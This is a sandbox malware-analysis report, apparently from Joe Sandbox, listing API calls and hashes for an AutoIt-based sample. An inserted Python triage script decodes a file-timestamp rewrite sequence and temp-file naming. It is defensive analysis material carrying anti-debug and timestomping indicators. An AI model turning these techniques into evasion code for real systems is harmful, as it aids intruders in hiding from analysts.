                                                                • Part of subcall function 00AD1C9D: GetLastError.KERNEL32(00000000,?,00AD7A85), ref: 00AD1CC3
                                                              • _free.LIBCMT ref: 00AFC557
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                              • String ID:
                                                              • API String ID: 1552873950-0
                                                              • Opcode ID: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                              • Instruction ID: f115283cbf2088d6bac884954f2636d0c87277d46993c68b6f7e0263f6108eb3
                                                              • Opcode Fuzzy Hash: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                              • Instruction Fuzzy Hash: B3514EB1904218AFDF149F64DD81AEDBBB9EF48314F1004AEB259A3242DB715A908F59
                                                              APIs
                                                              • _memset.LIBCMT ref: 00ACEBB2
                                                                • Part of subcall function 00AB51AF: _memset.LIBCMT ref: 00AB522F
                                                                • Part of subcall function 00AB51AF: _wcscpy.LIBCMT ref: 00AB5283
                                                                • Part of subcall function 00AB51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AB5293
                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00ACEC07
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00ACEC16
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B23C88
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                              • String ID:
                                                              • API String ID: 1378193009-0
                                                              • Opcode ID: 05589c1b5bd4c6b7fd5ae30c2fb42d9a1737505d24c05f8e58851c3e5e405791
                                                              • Instruction ID: b28ef693f44aa4d5098e25937137e7cfc26dee4363c982585e8a341d9b4c1b79
                                                              • Opcode Fuzzy Hash: 05589c1b5bd4c6b7fd5ae30c2fb42d9a1737505d24c05f8e58851c3e5e405791
                                                              • Instruction Fuzzy Hash: D221A7709087949FE732DB28DC59FEBBBECDB05708F04048DE69E67281C7786A848B51
                                                              APIs
                                                              • _memset.LIBCMT ref: 00B23725
                                                              • GetOpenFileNameW.COMDLG32 ref: 00B2376F
                                                                • Part of subcall function 00AB660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB53B1,?,?,00AB61FF,?,00000000,00000001,00000000), ref: 00AB662F
                                                                • Part of subcall function 00AB40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AB40C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                              • String ID: X
                                                              • API String ID: 3777226403-3081909835
                                                              • Opcode ID: 5e5ca27ee45f840e434b9c33a6eb56edd6b417905d74988306ef29928784bc74
                                                              • Instruction ID: a517f4cb164f5aa3aeb714a3ce285f61c06d6b8df57c80659b1a3170744f6be6
                                                              • Opcode Fuzzy Hash: 5e5ca27ee45f840e434b9c33a6eb56edd6b417905d74988306ef29928784bc74
                                                              • Instruction Fuzzy Hash: 6421A871A10298AFCF01DF98D845BDE7BFDDF49704F00405AE505A7242DFB85A898F65
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00AFC72F
                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00AFC746
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Temp$FileNamePath
                                                              • String ID: aut
                                                              • API String ID: 3285503233-3010740371
                                                              • Opcode ID: 2cc649c37d4092a6d447d26dc7ab977cdb0b77f93a645f3d26955f06946e837e
                                                              • Instruction ID: 0735681655a2aa6a4ab174ba761acc4b0355f91b1f1de5ce35b9ae07bd7435ad
                                                              • Opcode Fuzzy Hash: 2cc649c37d4092a6d447d26dc7ab977cdb0b77f93a645f3d26955f06946e837e
                                                              • Instruction Fuzzy Hash: 2AD05E7150030EABDB10ABA0EC0EF8BB7AC9700704F0001A0B651A60F1DAB4E6998B54
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 769977e28e62e808da9f4890de6f2fcd2f5c49c37e8304c92c1e176164706833
                                                              • Instruction ID: c33928a83281edfa7c40c66654be2c9271a04e41c8f16d8825a4aa57db7bc4dc
                                                              • Opcode Fuzzy Hash: 769977e28e62e808da9f4890de6f2fcd2f5c49c37e8304c92c1e176164706833
                                                              • Instruction Fuzzy Hash: 47F15A716083069FC720DF24C581B6ABBE5FF88314F14896EF9959B292DB70E945CF82
                                                              APIs
                                                              • _memset.LIBCMT ref: 00AB5022
                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AB50CB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell__memset
                                                              • String ID:
                                                              • API String ID: 928536360-0
                                                              • Opcode ID: c99a6a09e70c825fba954680848d9fa5705a65376479287e6bfda50c30af1585
                                                              • Instruction ID: 9520c3fc9d260952438240f60e250d124ad56fb76285607643084e5fce64f546
                                                              • Opcode Fuzzy Hash: c99a6a09e70c825fba954680848d9fa5705a65376479287e6bfda50c30af1585
                                                              • Instruction Fuzzy Hash: 5F314FB19047419FD721EF38E8456DBBBE8FB49304F00092EE59E87251E771A944CBA2
                                                              APIs
                                                              • __FF_MSGBANNER.LIBCMT ref: 00AD3973
                                                                • Part of subcall function 00AD81C2: __NMSG_WRITE.LIBCMT ref: 00AD81E9
                                                                • Part of subcall function 00AD81C2: __NMSG_WRITE.LIBCMT ref: 00AD81F3
                                                              • __NMSG_WRITE.LIBCMT ref: 00AD397A
                                                                • Part of subcall function 00AD821F: GetModuleFileNameW.KERNEL32(00000000,00B70312,00000104,00000000,00000001,00000000), ref: 00AD82B1
                                                                • Part of subcall function 00AD821F: ___crtMessageBoxW.LIBCMT ref: 00AD835F
                                                                • Part of subcall function 00AD1145: ___crtCorExitProcess.LIBCMT ref: 00AD114B
                                                                • Part of subcall function 00AD1145: ExitProcess.KERNEL32 ref: 00AD1154
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              • RtlAllocateHeap.NTDLL(00C70000,00000000,00000001,00000001,00000000,?,?,00ACF507,?,0000000E), ref: 00AD399F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 1372826849-0
                                                              • Opcode ID: 301101d9b0fe8540ba251ddc5425224ee9f7b9684e3d7e3e35204bd4e81b7da3
                                                              • Instruction ID: 8abd34a05052ed3a566c238776103b4cfbd99db0a05e038230e59955217c8418
                                                              • Opcode Fuzzy Hash: 301101d9b0fe8540ba251ddc5425224ee9f7b9684e3d7e3e35204bd4e81b7da3
                                                              • Instruction Fuzzy Hash: 9701F977355201AAEA253B28ED72A3E73589F81760F20012BF507D7381DFF09D408661
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00AFC385,?,?,?,?,?,00000004), ref: 00AFC6F2
                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00AFC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00AFC708
                                                              • CloseHandle.KERNEL32(00000000,?,00AFC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AFC70F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 8ebec463a4e1e8bb09fdacd333e9acf905e28e53ccfad215c4a4d5436d26283d
                                                              • Instruction ID: 8c94c300fd127c91bdb6fd977c4d1a51a6dd68f2e06a8cca7012fcd21381db98
                                                              • Opcode Fuzzy Hash: 8ebec463a4e1e8bb09fdacd333e9acf905e28e53ccfad215c4a4d5436d26283d
                                                              • Instruction Fuzzy Hash: 05E08632140618B7D7212B55BC09FCE7B18AB05770F204110FB157B0E09BB129119798
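The two function records above (the GetTempPathW/GetTempFileNameW pair with the "aut" prefix, and the CreateFileW / SetFileTime / CloseHandle sequence) are easier to read once the raw hex arguments are decoded. The following Python is an added example, not Joe Sandbox's own code and not part of this report: it parses the report's "APIs" line format as printed above, names the Win32 constants in the CreateFileW call, derives the file-name pattern that GetTempFileNameW produces for prefix "aut" with uUnique = 0 (documented Windows behaviour: first three prefix characters, up to four hex digits, ".tmp"), and flags the open-existing-for-write, set-timestamps, close sequence. The sample lines are copied from the records above; the argument positions assume the standard CreateFileW and GetTempFileNameW prototypes. A static API listing only shows that the code path exists in the AutoIt runtime, not that the script reached it during the run.

```python
import re

# Sample input: "APIs" lines copied verbatim from the function records in this report.
REPORT_LINES = [
    "• GetTempPathW.KERNEL32(00000104,?), ref: 00AFC72F",
    "• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00AFC746",
    "• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00AFC385,?,?,?,?,?,00000004), ref: 00AFC6F2",
    "• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00AFC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00AFC708",
    "• CloseHandle.KERNEL32(00000000,?,00AFC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AFC70F",
    "• IsThemeActive.UXTHEME ref: 00AB3A73",
]

# One "APIs" line: "• Api.MODULE(arg,arg,...), ref: ADDR"; the argument list is optional and
# "?" marks an argument the IDA plugin could not recover.
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_api_line(line):
    """Return {'api', 'module', 'args', 'ref'} for an API line, or None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": m.group("ref").upper()}


def hexarg(text):
    """Argument text -> int; None for '?' or string arguments such as 'aut'."""
    try:
        return int(text, 16)
    except ValueError:
        return None


# Win32 constants (winnt.h / fileapi.h) needed to read the CreateFileW arguments.
ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
          (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRS = [(0x1, "FILE_ATTRIBUTE_READONLY"), (0x2, "FILE_ATTRIBUTE_HIDDEN"),
         (0x4, "FILE_ATTRIBUTE_SYSTEM"), (0x80, "FILE_ATTRIBUTE_NORMAL"),
         (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE")]


def decode_bits(value, table):
    """Name every flag set in value; bits outside the table are kept as a hex remainder."""
    if value is None:
        return ["?"]
    names = [name for bit, name in table if value & bit == bit]
    rest = value & ~sum(bit for bit, _ in table)
    return names + ([hex(rest)] if rest else [])


def decode_create_file(call):
    """Decode CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
    dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile, ...) from a parsed line."""
    a = call["args"]
    if len(a) < 6:
        return {}
    return {"access": decode_bits(hexarg(a[1]), ACCESS),
            "share": decode_bits(hexarg(a[2]), SHARE),
            "disposition": DISPOSITION.get(hexarg(a[4]), "unknown"),
            "attributes": decode_bits(hexarg(a[5]), ATTRS)}


def temp_file_regex(call):
    """GetTempFileNameW(lpPathName, lpPrefixString, uUnique, lpTempFileName): Windows keeps the
    first three prefix characters and appends uUnique in hex (or, for uUnique == 0, a generated
    1-4 digit hex value) followed by '.tmp'. Returns a regex matching the resulting file names."""
    prefix = re.escape(call["args"][1][:3])
    unique = hexarg(call["args"][2])
    suffix = format(unique & 0xFFFF, "X") if unique else "[0-9A-F]{1,4}"
    return re.compile(r"(?:^|[\\/])" + prefix + suffix + r"\.tmp$", re.IGNORECASE)


def find_timestamp_rewrite(calls):
    """True when a CreateFileW that opens an EXISTING file for WRITE is followed by SetFileTime
    and then CloseHandle: the sequence used to rewrite a file's timestamps (timestomp candidate)."""
    order = [c["api"] for c in calls]
    for i, c in enumerate(calls):
        if c["api"] != "CreateFileW":
            continue
        d = decode_create_file(c)
        if "GENERIC_WRITE" in d.get("access", []) and d.get("disposition") == "OPEN_EXISTING":
            rest = order[i + 1:]
            if "SetFileTime" in rest and "CloseHandle" in rest[rest.index("SetFileTime"):]:
                return True
    return False


def analyse(lines):
    """Parse the listing and summarise what a triage analyst would want from it."""
    calls = [c for c in map(parse_api_line, lines) if c]
    temp = [temp_file_regex(c) for c in calls if c["api"] == "GetTempFileNameW"]
    return {"calls": calls, "temp_name_regex": temp,
            "timestamp_rewrite": find_timestamp_rewrite(calls)}


if __name__ == "__main__":
    result = analyse(REPORT_LINES)
    for call in result["calls"]:
        print(call["ref"], call["api"], call["args"][:6])
    print(decode_create_file(next(c for c in result["calls"] if c["api"] == "CreateFileW")))
    print([p.pattern for p in result["temp_name_regex"]], result["timestamp_rewrite"])
```

For this listing the CreateFileW call decodes to GENERIC_WRITE, FILE_SHARE_READ, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, and the temp-file regex matches names such as aut1A2B.tmp under the directory returned by GetTempPathW; a %TEMP% sweep for that pattern is a cheap host-side check, with the caveat that the same "aut" prefix is produced by any compiled AutoIt binary, benign or not.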
                                                              APIs
                                                              • _free.LIBCMT ref: 00AFBB72
                                                                • Part of subcall function 00AD1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00AD7A85), ref: 00AD1CB1
                                                                • Part of subcall function 00AD1C9D: GetLastError.KERNEL32(00000000,?,00AD7A85), ref: 00AD1CC3
                                                              • _free.LIBCMT ref: 00AFBB83
                                                              • _free.LIBCMT ref: 00AFBB95
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                              • Instruction ID: b10fba099853d28c83e1e2a80bb6db96e85f563728d672121fdc03faa84848dd
                                                              • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                              • Instruction Fuzzy Hash: 9EE012A166174556DA2467B9EF44EB323EC4F04352714081EB55AE7246EF24E84085B4
                                                              APIs
                                                              • _strcat.LIBCMT ref: 00B108FD
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • _wcscpy.LIBCMT ref: 00B1098C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf_strcat_wcscpy
                                                              • String ID:
                                                              • API String ID: 1012013722-0
                                                              • Opcode ID: 917e7c2a2f81f1693d009fe77211bfc271bff1366931a38b1b1e6a66818bc3e6
                                                              • Instruction ID: 2dbe3a40c522f9b0eae35a2f682a181f6e6f2ef2edf73a6c7902d9e23ecdbf5e
                                                              • Opcode Fuzzy Hash: 917e7c2a2f81f1693d009fe77211bfc271bff1366931a38b1b1e6a66818bc3e6
                                                              • Instruction Fuzzy Hash: 75913C35610605DFCB18EF18C5919A9B7E5FF59310B9580AAE85A8F392DB70EE81CF80
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 00AB3A73
                                                                • Part of subcall function 00AD1405: __lock.LIBCMT ref: 00AD140B
                                                                • Part of subcall function 00AB3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AB3AF3
                                                                • Part of subcall function 00AB3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AB3B08
                                                                • Part of subcall function 00AB3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00AB3AA3,?), ref: 00AB3D45
                                                                • Part of subcall function 00AB3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00AB3AA3,?), ref: 00AB3D57
                                                                • Part of subcall function 00AB3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00B71148,00B71130,?,?,?,?,00AB3AA3,?), ref: 00AB3DC8
                                                                • Part of subcall function 00AB3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00AB3AA3,?), ref: 00AB3E48
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AB3AB3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                              • String ID:
                                                              • API String ID: 924797094-0
                                                              • Opcode ID: 2e26778d99d0ab2bc7467c94224210e208d8dc0443fd21896b0d3c4b4caffccc
                                                              • Instruction ID: 6ebbb489e5257056fa0abbaee0c9a8e4580594f793722730d53e8058016e781f
                                                              • Opcode Fuzzy Hash: 2e26778d99d0ab2bc7467c94224210e208d8dc0443fd21896b0d3c4b4caffccc
                                                              • Instruction Fuzzy Hash: AB11AC719083409FC300EF29ED05A0EBBF9FB94350F00891EF489832A2DF709984CBA2
                                                              APIs
                                                              • ___lock_fhandle.LIBCMT ref: 00ADEA29
                                                              • __close_nolock.LIBCMT ref: 00ADEA42
                                                                • Part of subcall function 00AD7BDA: __getptd_noexit.LIBCMT ref: 00AD7BDA
                                                                • Part of subcall function 00AD7C0E: __getptd_noexit.LIBCMT ref: 00AD7C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                              • String ID:
                                                              • API String ID: 1046115767-0
                                                              • Opcode ID: 0abac1eb251ab8268307162da2affca0dd5bf0b85642aa5c099b32ea940796fc
                                                              • Instruction ID: 6a663b40bf833fb844356d0151e35c675d29184461613e09644a3f25c7243cfe
                                                              • Opcode Fuzzy Hash: 0abac1eb251ab8268307162da2affca0dd5bf0b85642aa5c099b32ea940796fc
                                                              • Instruction Fuzzy Hash: AC11C2729056118ED316FF68CA4131C7AA06F813B2F264343E4275F3F3DBB48C4086A1
                                                              APIs
                                                                • Part of subcall function 00AD395C: __FF_MSGBANNER.LIBCMT ref: 00AD3973
                                                                • Part of subcall function 00AD395C: __NMSG_WRITE.LIBCMT ref: 00AD397A
                                                                • Part of subcall function 00AD395C: RtlAllocateHeap.NTDLL(00C70000,00000000,00000001,00000001,00000000,?,?,00ACF507,?,0000000E), ref: 00AD399F
                                                              • std::exception::exception.LIBCMT ref: 00ACF51E
                                                              • __CxxThrowException@8.LIBCMT ref: 00ACF533
                                                                • Part of subcall function 00AD6805: RaiseException.KERNEL32(?,?,0000000E,00B66A30,?,?,?,00ACF538,0000000E,00B66A30,?,00000001), ref: 00AD6856
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3902256705-0
                                                              • Opcode ID: 358366c1e69463fe1662d80f2fc9dc35bffb28a79a0fe7d5316b23b0aa3074f9
                                                              • Instruction ID: 25f745567314379c046fc1f365be64852d1ac2e803ab3646306da0726abe56a4
